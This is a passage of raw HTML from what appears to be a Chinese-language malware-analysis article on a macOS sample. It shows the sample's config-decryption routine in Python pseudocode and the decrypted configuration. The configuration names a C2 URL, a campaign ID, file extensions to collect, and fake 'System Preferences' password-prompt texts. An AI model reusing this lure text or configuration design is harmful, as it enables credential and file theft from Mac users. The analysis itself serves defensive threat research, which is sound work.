solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">x86_64 / arm64</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">文件大小</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">521,440 bytes</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">编译器</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">Clang/LLVM (libc++)</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">符号表</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">Partial (C++ symbols present)</span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="137" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf="">壳/混淆</span></span></p></td><td data-colwidth="405" width="559" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align: left;margin: 0pt 0pt 0px;"><span style="font-size: 11pt;font-family: &#34;PingFang SC&#34;;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="PingFang SC"><span leaf="">未观察到常见壳</span></span></p></td></tr></tbody></table><p style="text-align: left;line-height: 1.3;margin: 16px 0pt;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">样本运行后动态解密配置中的C2：</span></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7824074074074074" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100027381" src="https://wechat2rss.xlab.app/img-proxy/?k=5f053acf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUuQlatBLM0ibsUdYSp6yHenFNdDSNSwFF13Qn1McALL53aQ1bCzZZ7PoMaTKZp8PFPvo6ZTUp3KCZdVf6qjqFGtRibrstc7TrnM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt 8px;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">解密算法伪代码：</span></span></span></p><pre style="padding:10px;background-color:#fafafa;border:1px solid #e1e1e1;border-radius:2px;overflow-x: scroll;"><code style="background-color: inherit;" data-tco-code-type="python"><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#0077AA;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">def </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#DD4A68;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">decrypt_config</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">data</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf=""> key</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">):</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    out </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">= </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">bytearray</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">data</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">)</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#0077AA;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">for</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf=""> i </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#0077AA;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">in </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">range</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">len</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">out</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">)):</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        out</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">[</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">i</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">] </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">^= </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">key </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&gt;&gt;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">((</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">i </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&amp; </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">7</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">) </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">* </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">8</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">)) </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&amp; </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">0xFF</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        key </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">=</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf=""> ror64</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">key</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">1</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">)</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#0077AA;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">return </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">bytes</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">(</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">out</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">)</span></span></code></pre><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">解密后而得到的C2配置如下：</span></span></p><pre style="padding:10px;background-color:#fafafa;border:1px solid #e1e1e1;border-radius:2px;overflow-x: scroll;"><code style="background-color: inherit;" data-tco-code-type="json"><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">{</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;meta&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">{</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;key&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;0xc35547640e63f941&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;length&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">316</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">},</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;config&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">{</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;field_0&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">47</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;field_1&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">10</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;campaign_id&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;jhzhhfomng&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;flag_0&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">1</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;c2&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;<a href="https://socifiapp.com" target="_blank">https://socifiapp.com</a>&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">        &#34;extensions&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">[</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">            &#34;pdf&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">            &#34;txt&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">            &#34;rtf&#34;</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    ],</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;prompt_title_1&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;System Preferences&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;prompt_body_1&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;You need to configure system settings before running this application.\\n\\nPlease enter your password.&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;prompt_title_2&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;System Preferences&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#990055;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">    &#34;prompt_body_2&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">:</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;Your Mac does not support this application. Try reinstalling or downloading the version for your system.&#34;</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#999999;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">,</span></span><span leaf=""><br/></span><span 